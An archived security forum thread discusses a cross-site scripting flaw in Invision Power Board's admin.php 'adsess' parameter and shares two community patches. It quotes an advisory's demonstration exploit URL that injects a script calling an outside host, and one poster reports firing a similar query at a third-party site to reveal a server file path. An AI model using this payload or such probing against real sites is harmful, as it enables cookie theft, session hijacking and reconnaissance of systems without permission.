hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

whisker
Hi,

I just read this just in case you are interested:
QUOTE

A demonstration exploit URL is provided:

http://forums.invisionpower.com/admin.php?adse ss='><script>window.open
(window.location.search.substring
(78));&lt;/script&gt;<http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision


Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Invision Power Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


Solution:  No solution was available at the time of this entry.


Vendor URL:  www.invisionboard.com/ (Links to External Site)
woutiir
Hey Whisker,

Nice post mate, I and many others (WHO DON't REPLY mad.gif ) are really thankful for this posts. So please keep 'm coming!

Greetings,
woutiir
Fletcher
yes very interesting
GSecur
Yeah great post whisker, packet just posted some information on this but it was a bit more vague.

As for this exploit everyone should always be weary of of what links they click on. And also don't save your password in the cookies!
packet
Yeah, sorry... my post was from the original bugtraq post by the researcher and I forgot that I needed to put CODE around it instead of QUOTE as it interpreted the code.

DOH!

--P.G.
packet
An *unnoficial* fix for the recent IB exploit from silent needle:

CODE

In-Reply-To: <20030809082131.25004.qmail@www.securityfocus.com>

to patch the forum

all what you have to do

is adding these lines in the begining of admin.php

======admin.php======

<?php



if (strstr($adsess,"'") != NULL){

 echo "Silent Needle: i don't like you.<br>dont try to hack. :) [be a

white hat don't be a black hat]<br><a href='index.php'>index.php</a>";

 exit;

}

if (strstr($adsess,"\"") != NULL){

 echo "Silent Needle: i don't like you.<br>dont try to hack. :) [be a

white hat don't be a black hat]<br><a href='index.php'>index.php</a>";

 exit;

}

//.........

//rest of code

=====================

this work with me and i hope it work with you too.



Oh Long Night

greetz to: SP.IC, NetSpider, ARAB-HAK, zalaboza, C0NIk, and all

arabsecure.net t34m..



Silent Needle

member of ArabSecure.net t34m

silentneedle@hotmail.com
GSecur
LOL nice code post packet, I'll have to check it out. I like the messages it sends biggrin.gif
packet
For a more concise fix (but not as fun) the original hacker (boy bear) posted this to bugtraq today:

CODE

In-Reply-To: <20030809082131.25004.qmail@www.securityfocus.com>

To repair Bug to edit the file admin.php and to add after the line:





$IN['AD_SESS'] = $HTTP_POST_VARS['adsess'] ? $HTTP_POST_VARS['adsess'] :

$HTTP_GET_VARS['adsess'];



To add this :



if (isset($IN['AD_SESS'])) {

$IN['AD_SESS'] = htmlspecialchars($IN['AD_SESS']);

}



And is it just me or does Boy Bear sound a little... well... you know? biggrin.gif I mean I totally respect that and all, I mean they call me a bear cause I'm hairy too. I try to tell them that us gophers are just naturally hairy but they don't seem to care. Hmmm... boy gopher doesn't have the same ring to it though does it? wink.gif

--P.G. (AKA the other boy wonder)
Black_hat
QUOTE
be a white hat don't be a black hat


It's good messege smile.gif

after send this query to this address : http://dns2go.deerfield.com/status/index.h...36;BinaryVision

the result give me physical location (On host machine)

C:\INETPUB\WWWROOT\V5\DEERFIELD.COM\PRODUCTS\DNS2GO\STATUS\USERSTATUS.CFM.

Cool smile.gif


ph34r.gif

Black_Hat
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.